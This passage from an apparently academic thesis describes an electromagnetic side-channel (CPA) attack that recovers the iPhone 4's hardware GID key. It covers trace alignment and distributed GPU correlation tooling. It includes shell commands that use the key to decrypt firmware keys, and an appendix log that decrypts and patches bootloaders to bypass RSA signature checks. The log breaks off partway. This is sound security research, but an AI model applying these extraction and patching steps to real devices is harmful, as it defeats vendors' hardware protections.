leakage can still be detected, although it rapidly decreases as the hamming model becomes smaller. Figure 5.10 shows the correlation for round 1-14 of the second block computed over 80Õ000Õ000 traces (after filtering). Even when using the 8-bit hamming model, a peak among noise for round 4, 6 and 9 can be seen at their corresponding position in Fig- ure 5.10d. It should be noted that for recovering the key with a bruteforce attack, only the 8-bit hamming model is suitable. The reason for this is that due to the nature of the power model which will be used for the attack (which is: hamming distance between plaintext and state in last decryption round after permutation and sbox), only the 8-bit model causes each bit of the guessed key to influence each bit of the state. Thus, only the correct key will correctly model the power consumption, while all wrong candidates will yield a random distribution in case of the 8-bit model. When using the 16-bit hamming weight, not all key bits influence the state (no MixColumns operation), which can cause a hypothetical trace being constructed with a partially correct key. This results in signal of the correct candidate being overlayed with noise by the other incorrect candidate. In addition to that, the fact that the 16-bit hamming weight has more hypothetical states (17 rather than 9), will decrease the eciency rather than being helpful in this case.

5.9 Full Chip Scan

More traces can be recorded in order to overcome the noise and get better correlation results. However, prior to that it makes sense to find an optimal position for the EM probe on the SoC, since previous measurements were performed by arbitrarily placing the probe on the SoC. After finding a leaking power model and analysing the implementation of the AES engine, it is possible to search for the best probe position using a more systematic approach. In order to do so, a scan of the full SoC is performed. This is done by setting the oscilloscope’s time frame to where the AES is expected to be executing and dividing the SoC into a grid of 25x25 positions, where at each position 150Õ000 traces with 40Õ000 points of 4 blocks CBC-AES-256 decryption are recorded. These choices were made so that the chip is covered as precise as possible (which results in moving around the probe by approximately half its diameter), recording enough samples to have several blocks in case some blocks overlap with I/O transfers, while keeping a reasonable size to be able to store and process the traces (which is about 6TB in this case). After recording the traces, correlation is performed on each of the 25x25 positions. Then, a 3D heatmap over the chip is created by plotting the highest value of each correlation trace. The procedure is performed for each of the 4 blocks and shown in Figure 5.11. In case a strong signal stands out, neighbouring positions are expected to have a similar correlation value at a near point in time. 38 5 AES Side-channel Analysis

Each of the 4 plots in Figure 5.11 shows two noticeable peaks located at the same posi- tions. The first peak is at the coordinates (X=3,Y=14) and the second is at (X=20,Y=23). Although the peaks barely stand out from noise and even when plotting the correlation over time at those hotspots peaks, they do not stand out significantly, it is unlikely to get 4 similar plots of just random noise. Thus, even though the data is insucient to proof these hotspots being the best positions, they are still considered the best candidates for further analysis. Because of limited storage (which is the biggest problem) and limited computing power, this approach is not suitable for more precise analysis. Thus, one of the hotspots is picked for further extensive measurements at that position. In this case (X=3,Y=14) was arbitrarily chosen. The exact probe positioning can be seen in Figure 5.12.

5.10 AES CPA Attack

After having found a leaking model and a good position on the SoC, it is possible to perform an attack in order to retrieve the GID key. Therefore, the setup is adjusted as follows: First, the probe is positioned on the SoC as described in Section 5.9. Then, the time frame and voltage resolution are adjusted according to previous analysis. Next, 200Õ000Õ000 traces are recorded with a known key and 600Õ000Õ000 traces are recorded using the target key. In both cases 8 blocks of random data are decrypted in CBC mode. Figure 6.1f shows 500 example traces (after alignment and filtering) corresponding to decryption with the target key.

5.10.1 CPA With Known Key

First, we inspect the traces corresponding to decryptions with a known key. Therefore, the power model is adjusted as follows: For the first 16 bytes of the key, the AES decryption output (plaintext with the CBC xor step reversed) is xored with the first round key (same as first 16 bytes of the master key), then put through the S-Box. The output of the S-Box is xored with the decryption output at the index where the permutation layer puts the byte. Eventually the 8-bit hamming weight of the resulting value is used as hypothetical power model. For the final 16 bytes of the key (same as the second round key), the same power model only one round later is used.

5.10.1.1 Correlation Analysis

Using this power model the correlation is computed for all 32 bytes of the known key. The majority of bytes yields a correlation with a clear distinguishable peak as seen in Figure 5.13a. Some bytes however yield a correlation trace where no peak significantly distinguishes from noise such as seen in Figure 5.13b. 5.10 AES CPA Attack 39

Inspecting each of the 16 correlation traces for the first round yields that the best absolute correlation for every key byte is at the exact same point in time. In this case, the best leakage is the positive peak at sample 3101 as seen in Figure 5.13a. To visualize this, Figure 5.14 shows just the highest absolute correlation value of each trace at their corresponding point in time. Most dots are located almost exactly at sample 3101. Just a few dots have a maximum absolute correlation at a dierent point in time. Further analysing the bytes which do not have their highest absolute correlation at sample 3101 yields that these bytes do not have a clear peak at all as seen in Figure 5.13b. This observation gives two important insights. First, it supports the hypothesis of a round based AES implementation as discussed in Section 5.7, where a 128-bit register is updated each round, which means that each round takes one clock cycle. This is because if a 128-bit register is updated on every round, then all 16 bytes leak at the exact same time during this register update, which is indeed the observed case. On the other hand, if smaller registers were used which were updated sequentially, the highest correlation value for each byte would not be located at the exact same point in time, but they would rather be more shifted instead. The second insight is a direct implication of the first one, which is, that it makes sense to focus on one single sample, or rather a small window to compensate errors, for recovering the key bytes of one single round.

5.10.1.2 Known Key Attack Simulation For performing the attack, 256 traces are computed for all key bytes in one round, each containing the Pearson correlation coecient for every sample point. This results in 256 16 = 4096 traces for recovering the first 16 bytes. Figure 5.15 shows the correlation ú over keys. For generating Figure 5.15a all 256 traces for one byte were scanned in the range [3050, 3150] for their highest correlation value. The point in time with the highest of these 256 values was then used as template to retrieve the correlation values of all 256 traces at that exact point in time. For example, if the maximal value of key candidate 0x08 is 0.000194 at sample 3101 and the maximal value of key candidate 0x25 is 0.000089 at sample 3094 then, (assuming the value 0.000194 of candidate 0x08 is the largest among all candidates) every key candidate gets assigned the value at sample 3101 in its correlation trace before the candidates are plotted. Since the correct candidate trace yields a peak which is the highest among all peaks in all traces, it will significantly stand out in the plot. Figure 5.15b on the other hand is generated by setting the template point to 3100 in advance, which is the highest peak at the previously computed correlation as shown in Figure 5.13a. Even though the correlation trace of the correct key byte is very noisy and the highest peak in Figure 5.15b does not reflect the correct key, the correct candidate is among the top 5 highest peaks as seen in the following:

1. Key=0x13 corr=0.000115

2. Key=0x83 corr=0.000109 40 5 AES Side-channel Analysis

3. Key=0xb6 corr=0.000109

4. Key=0x05 corr=0.000100 - correct key

5. Key=0xff corr=0.000092

Thus, this key-ranking approach can be used for bruteforcing the AES-256 key using a highly reduced search space for key bytes where a candidate does not significantly stand out.

5.10.2 CPA on Target Key After having analysed the AES engines behavior using a known key, this section proceeds with recovering the target key. After performing alignment and filtering, 256 correlation traces are computed for each key byte as previously described in Section 5.10.1.2. Based on the previous analysis, we decided to attack the fifth decryption block. Therefore, correlation is not computed for the first 11Õ000 samples of the trace. For recovering the first 16 key bytes from 4096 correlation traces, the highest absolute correlation value among all samples in all traces needs to be found. Keeping in mind that there are bytes with greater leakage than others, it is expected to find a key candidate for at least one byte with significant leakage. This yields the trace in Figure 5.16, showing the highest absolute correlation value of 0.000232861 among all correlation traces, at sample 3817 for the key candidate 0xb6 at index 10. From previous analysis we know that all bytes leak at the same time, thus we proceed by plotting the correlation over keys for all key bytes, searching for the highest peak in the range [3810, 3820] among the candidates for each byte. Some of these plots are shown in Figure 5.17. It can be seen that some bytes show significant leakage, like the byte index 6 (Fig- ure 5.17b) and index 8 (Figure 5.17c). No further processing is needed for those bytes, as they have a very high likelihood of being the correct candidate. Other bytes like the one at index 11 (Figure 5.17d) have a peak which does stand out, although not as significantly as thoese at index 6 and 8. These candidates are likely to be correct, yet it should be kept in mind that there might be false positives. Those bytes are candidates for later revision and further analysis in case the recovered key is not correct. Lastly, there are bytes like the one at index 4 (Figure 5.17a), where it is not possible to certainly distinguish the correct candidate from noise. There are several ways to address this issue. First of all, we focus just on the positive peaks, since in previous known key correlation analysis the most leaking peaks were always positive. Thus, all candidates yielding a correlation below zero can be discarded. Second, since due to the oscilloscope’s time resolution, measurement errors, alignment and noise; the point in time of maximal leakage is not always at the exact same position (but may vary by a few samples). For those bytes it makes sense to take into account correlation values close by. 5.10 AES CPA Attack 41

By visually inspecting correlation-over-key plots at each sample in the range [3810, 3820], where the x-axis represents the key candidate and the y-axis shows the Pearson correlation coecient, likelihood for certain candidates can be increased or decreased. For example, if at sample 3815 a candidate is the second best, but at sample 3818 the same candidate is not even among the top 10 best candidates, chances are that this candidate is a false positive rather than the correct key. On the other hand, if one candidate is always in the top 5 best candidates or at least very often in the upper ranges, it is less likely for that candidate to be just noise. That candidate should be considered for further selection or (if applicable) for brute-force over a reduced search space. An example is shown in Figure 5.18. Manually inspecting individual samples in the range [3814, 3818] yields 0x5e as the best candidate, rather than 0x36 as retrieved previously by searching for the highest peak within the range [3810, 3820] (see Figure 5.17). While these methods are a good last resort, there is another more obvious approach to deal with key bytes which yield a low correlation. Since 8 blocks are decrypted in CBC mode, it is possible to perform the attack on another block and compare the results with the current block. In the worst case, the previously described approach of eliminating candidates can be extended to reduce the search space even further, as another block brings another source of information. In the best case however, the correlation for the problematic key bytes at a dierent block is not as noisy, so that the key byte can be recovered directly from the highest peak. Figure 5.19 shows the correlation-over-key guesses for byte index 4 at the second block, which yields a much better peak compared to Figure 5.17a. The highest peak in Figure 5.19 is 0x5e, which confirms the candidate recovered from the previously described elimination approach. Using this method the first 16 bytes of the master key (AES first round key) are recovered with good confidence. To recover the final 16 bytes of the master key (AES second round key), the first round key is used to derive the state before the second round. Now, by guessing individual bytes of the second round key, we can derive hypothetical power values based on the same power model as for the first round, just one round later. This again yields 4096 correlation traces, which are processed in the same way as the first round correlation traces. Using this method it was possible to successfully recover the full AES-256 target key. The SHA1 hash of the key is 846017165c9f50304fb465fee6978f22dc82da10. The key can be verified by decrypting the ciphertexts in the traces and comparing them to their corresponding plaintexts. Another way to verify the recovered key is to decrypt an iPhone firmware component encryption key. Listing 5.1 shows the decryption of the kernel key for iPhone3,2 iOS 7.1.2 build 11D257. 42 5 AES Side-channel Analysis

$ unzip iPhone3,2_7.1.2_11D257_Restore.ipsw kernelcache.release.n90b Archive: iPhone3,2_7.1.2_11D257_Restore.ipsw inflating: kernelcache.release.n90b $ xxd -p kernelcache.release.n90b | tr -d ’\n’|grep -o "4741424b.*" | xxd -r -p | dd bs=1 skip=0 x14 count=48 2>/dev/null | openssl aes-256-cbc -iv 00000000000000000000000000000000 -d -nopad -K $(cat A4GIDKey.txt)|xxd -p | tr -d ’\n’;echo 054fa7c7537f0d7f5271349656d729e6f24fa28626283eb1e252fec878ab0716d0fd7b6e62cf114fcd1ce132ba96d633 $ Listing 5.1: Using the GID key to get the kernel encryption key for iPhone3,2 iOS 7.1.2 build 11D257

First, the kernel image is extracted from the firmware. Then, the encrypted key is extracted from the kernel image and passed to openssl together with the GID key (which is read from a text file). This yields the IV 054fa7c7537f0d7f5271349656d729e6 and key f24fa28626283eb1e252fec878ab0716d0fd7b6e62cf114fcd1ce132ba96d633, which can also be found on theiphonewiki[Thee]. Finally, to answer the question on how many traces are required to recover the GID key, correlation over traces is plotted using intermediate computation results. Figure 5.20 shows the correlation for each key candidate over the number of traces with the correct key being highlighted in red. The number of required traces varies greatly for dierent key bytes and highly depends on probe positioning, targeted block and quality of alignment and filtering. In this thesis some key bytes could be recovered with as little as 30Õ000Õ000 traces (Figure 5.20b), while others required at least 270Õ000Õ000 traces (Figure 5.20a and Figure 5.20d). 5.10 AES CPA Attack 43

(a) 1 block (b) 2 blocks

(c) 4 blocks (d) 8 blocks

(e) 16 blocks

Figure 5.1: Traces for dierent number of blocks being decrypted in AES256-CBC mode 44 5 AES Side-channel Analysis

Figure 5.2: Multiple AES decryption traces of dierent number of block plotted on top of each other

Length/Blocks Length Blocks GPIO Peak GPIO Peak Di 1 1999.76ns 755.58ns 1999.76ns 755.58ns 1244.18ns 2 1062.52ns 437.79ns 2125.04ns 875.58ns 1249.46ns 3 708.39ns 301.89ns 2125.16ns 905.68ns 1219.48ns 4 531.33ns 220.14ns 2125.34ns 880.55ns 1244.78ns 5 458.35ns 190.12ns 2291.74ns 950.58ns 1341.16ns 6 381.97ns 177.64ns 2291.81ns 1065.83ns 1225.98ns 7 345.28ns 162.27ns 2416.96ns 1135.86ns 1281.11ns 8 317.79ns 156.36ns 2542.34ns 1250.91ns 1291.43ns 9 301.01ns 147.31ns 2709.11ns 1325.83ns 1383.28ns 10 270.87ns 144.10ns 2708.74ns 1441.03ns 1267.71ns 11 246.24ns 136.46ns 2708.64ns 1501.03ns 1207.61ns 12 239.62ns 134.67ns 2875.46ns 1616.01ns 1259.46ns 13 230.84ns 131.24ns 3000.89ns 1706.16ns 1294.73ns 14 223.30ns 129.39ns 3126.19ns 1811.41ns 1314.78ns 15 208.39ns 125.42ns 3125.84ns 1881.28ns 1244.56ns 16 205.82ns 124.78ns 3293.17ns 1996.46ns 1296.71ns

Figure 5.3: AES decryption timings 5.10 AES CPA Attack 45

(a) 500 traces after alignment (b) t-value

(c) t-value (zoomed) (d) t-value on top of a trace

Figure 5.4: Non-Specific t-test plots 46 5 AES Side-channel Analysis

(a) Full SNR trace (b) SNR zoomed on ciphertext

(c) SNR zoomed on plaintext (d) SNR on top of a trace

Figure 5.5: Signal-to-Noise Ratio using the hamming weight of the 6th ciphertext/plain- text byte as power model 5.10 AES CPA Attack 47

(a) Block 2 (b) Block 3

(c) Block 4 (d) All rounds of multiple blocks in one plot

(e) All rounds of multiple blocks on top of a trace

Figure 5.9: Correlation traces of leaking power model computed for round 0-14 for multiple blocks 48 5 AES Side-channel Analysis

(a) HW64 (b) HW32

(c) HW16 (d) HW8

Figure 5.10: Correlation traces of smaller hamming models computed for round 1-14 of block 2 5.10 AES CPA Attack 49

(a) Block 1 (b) Block 2

(c) Block 3 (d) Block 4

Figure 5.11: 3D heatmap of the SoC plotting highest correlation in time over physical space using the leaking 128-bit power model

Figure 5.12: EM probe positioning on the SoC based on heatmap analysis 50 5 AES Side-channel Analysis

(a) index 8 (b) index 1

Figure 5.13: Correlation traces for known key

Figure 5.14: Visualizing highest correlation values for each key byte in the known key correlation trace

(a) index 8 (b) index 5

Figure 5.15: Correlation over keys for key byte index 8 and 5 of known key measurements 5.10 AES CPA Attack 51

Figure 5.16: Correlation over time with the highest peak for byte index 10 of the target key starting from sample 11Õ000

(a) index 4 (b) index 6

(c) index 8 (d) index 11

Figure 5.17: Correlation over keys for target key bytes of the fifth decryption block 52 5 AES Side-channel Analysis

(a) 3814 (b) 3815

(c) 3816 (d) 3817

(e) 3818

Figure 5.18: Correlation over keys for close by samples for target key byte index 4 of the fifth block

Figure 5.19: Correlation over keys for target key byte index 4 of the second decryption block 5.10 AES CPA Attack 53

(a) Index 6 (b) Index 18

(c) Index 24 (d) Index 25

Figure 5.20: Correlation over traces for bytes of the fifth block of target key decryptions

6 Tooling

This section covers the description of algorithms used to process the traces and perform statistical analysis.

6.1 Alignment of Traces

In the following, two methods are presented to properly align recorded traces and to discard outliers. The first uses manual multi step filtering with alignment based on a minimum value optimization problem. The advantage of this method is that one has precise control over alignment and filtering. This allows discarding the least amount of traces while still having the best possible alignment quality. The disadvantage is that manual work is involved, which has to be re-done from scratch for each measurement. Another approach is automatic alignment, which is used where the manual method is not feasible. It does not filter and align as accurately, but on the other hand it also does also not require any manual processing.

6.1.1 Manual Alignment The process for manual alignment is individually adjusted for each measurement. To provide an example the alignment of the traces used to retrieve the target key is shown in Figure 6.1 and is described in the following. By looking at the raw trace as presented in Figure 6.1a, three larger groups of traces can be seen, namely those with negative Out Of Bounds (OOB) values in the range [7400, 8600] and positive OOB values in the range [7300, 8200]; the ones with positive OOB [9000, 11000] and negative OOB [8800, 10600] and finally the ones with positive OOB [11200, 12900] and negative OOB [10900, 12100]. Furthermore, there are some traces with OOB values before 6800. First, a coarse grained alignment and filter is applied to get rid of outliers. This is done by discarding every trace with a value below 75 in the range [1000, 6800].Thered ≠ line in Figure 6.1a visualizes that boundary. Next, the first sample with a value above 120 in the range [6000, 11000] (visualized by the green line) in each trace is searched and the new synchronised start of the trace is set to 5700 samples before that position. The result of this can be seen in Figure 6.1b. It should be kept in mind that due to this alignment, OOB data is plotted for some traces. This can be seen at sample 17000 and further, where the stored plaintext/cipher- text, metadata and then the trace immediately after that in the buer is plotted. This is ignored for now and taken care of later. 56 6 Tooling

The second step is to perform a more fine grained alignment. Therefore, a window of 2Õ000 samples is placed as indicated by the red lines in Figure 6.1b. Next, one trace is used as template and every other trace is aligned to it. This is done by subtracting the value of each point in time in the trace from the template trace, then summing up the absolute dierences. Subsequently, the trace is shifted by up to 500 samples to the left/right and each time a sum of dierences is computed. Finally, the oset with the smallest absolute dierence is used to align the trace. The blue lines indicate the maximum shift, which means that the sample at the left red line can only be shifted to the left until it overlaps with the left blue line, but no further. Same applies with the right red and blue lines. The blue lines should always stay within the trace, which is something that should be kept in mind when applying this to an area close to the beginning or end of the trace. The result of this fine grained adjustment can be seen in Figure 6.1c. The third step applies another filter, which discards traces with a value above 125 in the range [11000, 13000] or a value below 85 in the range [10000, 15000]. This is visualized ≠ by red lines in Figure 6.1c and the result can be seen in Figure 6.1d. Afterwards, another fine grained smallest absolute dierence alignment is applied to the trace in the range as indicated by the red lines in Figure 6.1d. Finally, (as seen in Figure 6.1e) a last filter is applied to the result, discarding all traces with a value below 55 in the range [0, 6700], ≠ again indicated by a red line. The result after performing all these steps can be seen in Figure 6.1f. Even though during this process the alignment is handled mostly manually and the concrete parameters need to be adjusted for each measurement individually, this still is a good time-result trade-oas applying these steps requires low eort and has the advantage of having precise control of the whole process, as well as immediately beginning able to evaluate the results after each step. In this particular example about 30% of the traces were discarded. To speed up this process the task is split across multiple threads processing several traces each and Intel AVX[Lom11] Single Instruction Multiple Data (SIMD) instructions are used to compute the oset with the smallest absolute dierence to the template trace.

6.1.2 Automatic Full Chip Scan Alignment The previously described manual alignment method is not suitable for processing the full chip scan described in Section 5.9, because manually configuring alignment rules for 625 sets of traces is not feasible. Thus, an automatic way is needed to align traces at each position. In case of the full chip scan, automatic alignment faces several challenges. One of them is the fact that the scan program automatically adjusts the voltage range settings to have the highest signal peaks use the full spectrum, which means peaks can potentially look dierent in every trace set. Another challenge is that it is not possible to know in advance at what points in time peaks will appear and how many there will be. Not many assumptions can be made when aligning the traces at each position on the chip, since it is not possible to know the number of peaks, their height or their position. Nonetheless, we can assume that there has to be at least one time frame in which the 6.2 Ecient Correlation Implementation 57

measured peaks are significantly above other lower peaks on the trace. This is because if all peaks were the same height, the trace would be considered being just noise without any useful signal. Thus, the idea is to find a range where the peaks are the furthest apart from the mean value, as this is the range where the previously described smallest absolute dierence alignment works best. The first step is to compute a mean trace over all traces. This is done to filter out noisy parts of the trace, without knowing where the noise is in advance. A mean trace with all processing steps, which are described in the following, can be seen in Figure 6.2. The second step is to find all peaks. These are indicated by colored dots in Figure 6.2. Next, a mean is computed over all peaks. The result is visualized by the horizontal orange line. Afterwards, the peaks are separated into two groups. The ones above the mean and the ones below. Then, a mean is computed again for each group separately. The green line illustrates the mean for the peaks above the orange line, while the red line illustrates the mean for the peaks below the orange line. Subsequently, all peaks which are in between the green and red line are discarded and just the peaks outside that range are further processed. This is done to discard the ground noise and to process just the signal candidate peaks. Finally, a window of 3Õ000 samples is moved over the trace and for each position a score is computed by summing up the distance of the (orange) mean to each peak outside the range of the red and green line. The position with the highest score is then used for aligning all traces using the smallest absolute dierence method with a arbitrary template trace. This process is repeated for each position on the chip.

6.2 Ecient Correlation Implementation

This section deals with eciently computing multiple correlations using a pipelined multiprocessing approach in order to recover the AES key. For this purpose a scaleable program was written to distribute computation among multiple threads on multiple GPUs on multiple hosts. This setup uses an over-the-network client-server approach with one central server and multiple trusted clients. Some parts are hardcoded for the current use case, however it is possible to adjust certain parts, like switching to a dierent power model, with low eort.

6.2.1 Server In this section the server is described in detail, which is started with the following parameters: The first two parameters are the input directory containing aligned traces and the output directory where the correlation traces will be saved to. Further parameters are the power models (represented as strings) which will be computed by the clients. For recovering the target key, 30Õ000 files were used containing (on average) 14Õ000 traces each. 58 6 Tooling

On initialization the server scans the input directory and creates a list of all files residing in that directory, then adds them to a work queue. One of the trace files is loaded in order to read the number of points per trace, which is assumed to be consistent among all trace files. Afterwards, a Transmission Control Protocol (TCP) socket is opened and the server listens for incoming connections on port 8452. When a client connects, the number of points per trace and a list of power models (see Section 2.2.3) represented as strings are sent to the client for initialization. Afterwards, the client is ready to receive a batch to work through. While the client is connected, the following procedure is executed in a loop: While the work queue is not empty, a batch of filenames is taken from the queue and sent to the client. Since only filenames are transferred, the clients are responsible for loading the correct trace files using this information. One possibility of distributing traces to the clients is to use the bittorrent[Coh03] protocol and to mount a .torrent file using the FUSE[liba] based BTFS[joh]filesystem. This allows having multiple servers seeding the traces, which is a scaleable way to distribute large amounts of data, considering disk reading speed might become a bottleneck at a certain amount of data and number of clients. Another way is to mount a Windows shared folder on all clients, which was done in this thesis due to lack of multiple seeding servers. A third option is to make the clients download traces over Hypertext Transfer Protocol (HTTP), which was implemented but not used during this thesis. The clients are expected to compute intermediate values such as the mean and central sum for their traces as well as the hypothetical traces for each power model and send them back to the server. When those are received, the server proceeds to use those results to update global mean and central sum traces using the incremental batch formulas described in Section 2.2.7. Eventually another set of filenames is sent to the client and the procedure is repeated until no more filenames are in the queue. In case a client disconnects, its work-in-progress batch is re-appended to the global queue and re-distributed among other clients. Due to the pre-requisite of trusted clients, only basic error checking and no proper validation is performed on the received computation results. When all traces are processed and the results are received, the server proceeds to compute the correlation using the intermediate values. Optionally it is possible to compute an intermediate correlation each time a client sends results or after a certain number of traces were processed. This is useful for generating plots like the ones seen in Figure 5.20.

6.2.2 Clients Due to the way this project is designed, there are no restrictions on how a client processes the traces. Only correctly implementing the network protocol and somehow processing the traces is important. Thus, several implementation such as multithreaded CPU implementation on dierent architectures are feasible, possibly implementing support for SIMD instructions like Intel AVX or SSE. It is also possible to implement a client in 6.2 Ecient Correlation Implementation 59

JavaScript to use the computing power of closed systems by visiting a website in a browser. Another option is to implement the client with GPU acceleration using CUDA[NVI10] or OpenCL[Khr11]. The latter is described in the following section.

6.2.3 OpenCL GPU Client This section describes a client which performs the computations on one or multiple GPUs using OpenCL. The client is started with the following four parameters: The input directory containing aligned traces, server address and port separated by a colon, the available amount of RAM in bytes and a comma separated list of GPU indices to be used. The client starts by reading a kernels.cl file, which contains the source code to be executed on the GPU with all possible power models. Then, it connects to the server and receives the power model names as well as the number of points each trace has. For every power model which needs to be processed, each GPU gets a separate worker instance with their own queue. A so called GPUpowermodel instance receives the kernels.cl source file, the number of points per trace and gets assigned a power model name. The kernels.cl source code copy is modified on the fly so that the corresponding power model is selected. Afterwards, it is compiled and the program is transferred to the GPU. In addition every GPUpowermodel allocates memory for holding a mean and central sum trace with the number of points as previously received, together with memory for 256 hypothetical mean traces and hypothetical central sum traces with one point per trace each. Furthermore, memory for 256 so called upper part traces are allocated, which store nu- merator precomputation values of the Pearson correlation coecient (see Section 2.2.5.2), based on real and hypothetical traces. Those allocations are doubled as there are two sets contain each of these, one local and one global. The local set holds the results of an individual trace file after it has been processed, while the global set holds the combined results of all trace files processed on one GPU. When the initialization is finished, the client proceeds to receive a batch of filenames from the server. A queue is created from that list and multiple threads start loading the files to RAM from the location specified in the first parameter. This loading can be either from local disk, a shared drive mounted over the network, a BTFS FUSE based filesystem receiving the files over bittorrent or a HTTP server. When a file is loaded and possibly decompressed, it is appended to a queue where other worker threads can get it for further processing. Since loading can take some time depending on the source, a certain amount of files is buered in RAM. The exact number is computed dynamically by taking into account the available RAM size as specified in the third parameter. While the files are being loaded, a worker for each GPU is waiting to dequeue them for further processing. When multiple GPUs are used, a trace file is only processed on one of them. 60 6 Tooling

Since after alignment and filtering the number of traces in each file varies and can be much smaller than before filtering, it is possible to combine multiple files in RAM before transferring them to the GPU, if the number of traces is below a certain threshold. In this particular case multiple files are combined when a file has less than 20Õ000 traces, unless the combination will result in more than 25Õ000 traces. After all files from the current batch were loaded and transferred to the GPUs, the client waits for all GPUs to finish processing. Then, the global results of each GPU are transferred to RAM and incremental batch formulas (Section 2.2.7) are used to combine all sets into one set consisting of one mean and central sum trace, 256 hypothetical mean and central sum values as well as 256 upper part traces for each power model. Finally, the results are sent to the server, the GPU memory is cleared and the process is started over if more work is available. Whenever a worker receives a trace it is transferred to the GPU if there is enough free Video Random Access Memory (VRAM) left. Otherwise the transfer is stalled until there is enough VRAM available. The memory object in VRAM gets a reference counter assigned, which is incremented once for each GPUpowermodel available. Afterwards, that object is passed to every GPUpowermodels work queue. Each GPUpowermodel processes a trace by computing a local mean and central sum trace, 256 hypothetical mean and central sum values as well as 256 upper part traces. Then, the incremental batch formulas are used to update the GPUs global traces. Afterwards, the trace reference counter is decremented and the memory is freed once it reaches zero. 6.2 Ecient Correlation Implementation 61

(a) Raw (b) After step 1

(c) After step 2 (d) After step 3

(e) After step 4 (f) Final

Figure 6.1: 500 traces plotted after each alignment step 62 6 Tooling

Figure 6.2: Mean trace processing during automatic alignment 7 Conclusion

This chapter summarizes the results of this thesis and gives ideas for future work.

7.1 Summary

The EM side-channel is used to analyse the AES engine of the Apple iPhone 4. Then, using an accurate power model, we were able to recover the full hardware fused 256-bit GID key through EM leakage, with a highly optimized CPA attack. Results of the analysis are summarized in the following. The AES engine is implemented in hardware and features 128-bit, 192-bit and 256-bit encryption and decryption modes. These can be used with the UID key, the GID key or a user supplied key to encrypt/decrypt one or multiple blocks in CBC mode. From the CPUs perspective it takes about 2000ns to decrypt one single block including I/O transfers to and from the AES engine (first row, fourth column in Figure 5.3). On the engine however, one single round takes 5ns (Section 5.7), while 14 rounds of AES-256 decryption take 70ns. Including latency, one block needs 95ns to be fully processed within the engine. Several facts suggest that the implementation is round based, where a 128-bit register is updated on every round. The register holds the state after S-Box and permutation layer P (S(Sr)) in each round. It is assumed that a round is processed in one single clock cycle (Section 5.7). Based on that, the clock speed for the AES engine is assumed to be 200MHz.

7.2 Future Work

This thesis focused on analysing the cryptographic properties of the Apple iPhone 4 using a public BootROM vulnerability. Future work can follow up and port the research presented here to newer devices, utilizing the checkm8[@ax] exploit by @axi0mX. Interesting targets are the iPhone 5s, which is the first Apple device to use a 64-bit ARM CPU, or the iPhone X, which (at the time of writing) is the latest device with a publicly known BootROM vulnerability. Furthermore, it would be interesting to see whether modern smartphones implement countermeasures like masking or hiding to make side-channel analysis harder and whether it is possible to break these with a setup similar to the one used in this thesis. Also, future work could try to combine this research with boot loader glitching in order to perform side-channel attacks without requiring a software vulnerability.

A Acronyms

AES Advanced Encryption Standard CBC Cipher Block Chaining CMOS Complementary Metal-Oxide-Semiconductor CPA Correlation Power Analysis CPU Central Processing Unit DFU Device Firmware Upgrade DMA Direct Memory Access DPA Dierential Power Analysis DRAM Dynamic Random Access Memory EM Electro Magnetic GID Group Identifier GPIO General Purpose Input/Output GPU Graphics Processing Unit HTTP Hypertext Transfer Protocol IC Integrated Circuit I/O Input/Output IV Initialization Vector KEK Key Encryption Key KTRR Kernel Text Readonly Region MMIO Memory Mapped Input/Output NIST National Institute of Standards and Technology NVRAM Non-Volatile Random Access Memory OOB Out Of Bounds PRNG pseudorandom number generator RAM Random Access Memory 66 A Acronyms

ROP Return Oriented Programming S-Box Substitution Box SDK Software Development Kit SIMD Single Instruction Multiple Data SNR Signal-to-Noise Ratio SoC System on Chip SPA Simple Power Analysis SRAM Static Random Access Memory TCP Transmission Control Protocol UART Universal Asynchronous Receiver Transmitter UID User Identifier USB Universal Serial Bus VRAM Video Random Access Memory BCode

$ #Step 1: Download firmware file $ wget http://appldnld.apple.com/iOS7.1/031-4785.20140627.zZ42j/iPhone3,2_7.1.2_11D257_Restore. ipsw 2>/dev/null $ #Step 2: Extract bootloaders $ unzip iPhone3,2_7.1.2_11D257_Restore.ipsw Firmware/dfu/iB* Archive: iPhone3,2_7.1.2_11D257_Restore.ipsw inflating: Firmware/dfu/iBEC.n90bap.RELEASE.dfu inflating: Firmware/dfu/iBSS.n90bap.RELEASE.dfu $ #Step 3: Decrypt bootloaders $ xpwntool Firmware/dfu/iBSS.n90bap.RELEASE.dfu iBSS.dec -iv a5e8a7cd8e659db3b6f983409b98b66c -k 42865aa964f0cba160d173794530e40e46910e14383f3ac9d24cd650ebdb9926 /Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 1593 dc1708931070f981482bff0832f3161aed51ccdd184630c969b15a614482e496bdaf4823a30b7031291da75da1b3 $ xpwntool Firmware/dfu/iBEC.n90bap.RELEASE.dfu iBEC.dec -iv a6ff0ef84ca1c536f540b81c0c858858 -k 45f08035e58d63e6426f1b81fa760e6019b37a42c5286b108b4c37f58e0bc06b /Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 0 ca08f47d0ec62d03cfdc73bcdfc6f67c07032b9ada3e301c3051a02f4ea6c4edd4a559ff2aac6f0034c625f48a00fd8

$ #Step 4: Patch bootloaders $ iBoot32Patcher iBSS.dec iBSS.hax main: Starting... main: iBoot-1940 inputted. patch_rsa_check: Entering... find_bl_verify_shsh_5_6_7: Entering... find_bl_verify_shsh_5_6_7: Found MOVW instruction at 0x5564 find_bl_verify_shsh_5_6_7: Found BL verify_shsh at 0x5890 find_bl_verify_shsh_5_6_7: Leaving... patch_rsa_check: Patching BL verify_shsh at 0x5890... patch_rsa_check: Leaving... main: Writing out patched file to iBSS.hax... main: Quitting... $ iBoot32Patcher iBEC.dec iBEC.hax -c go 0x40000001 main: Starting... main: iBoot-1940 inputted. patch_debug_enabled: Entering... find_dtre_get_value_bl_insn: Entering... find_dtre_get_value_bl_insn: debug-enabled string is at 0x39322 find_dtre_get_value_bl_insn: "debug-enabled" xref is at 0x1aa20 find_dtre_get_value_bl_insn: Found LDR R0,="debug-enabled" at 0x19cf8 find_dtre_get_value_bl_insn: Found BL instruction at 0x19d10 find_dtre_get_value_bl_insn: Leaving... patch_debug_enabled: Patching BL insn at 0x19d10... patch_debug_enabled: Leaving... patch_cmd_handler: Entering... patch_cmd_handler: Found the cmd string at 0x32e62 patch_cmd_handler: Found the cmd string reference at 0x3f3e4 patch_cmd_handler: Pointing "go" from 0x5ff01171 to 0x40000001... patch_cmd_handler: Leaving... patch_rsa_check: Entering... find_bl_verify_shsh_5_6_7: Entering... find_bl_verify_shsh_5_6_7: Found MOVW instruction at 0x18c20 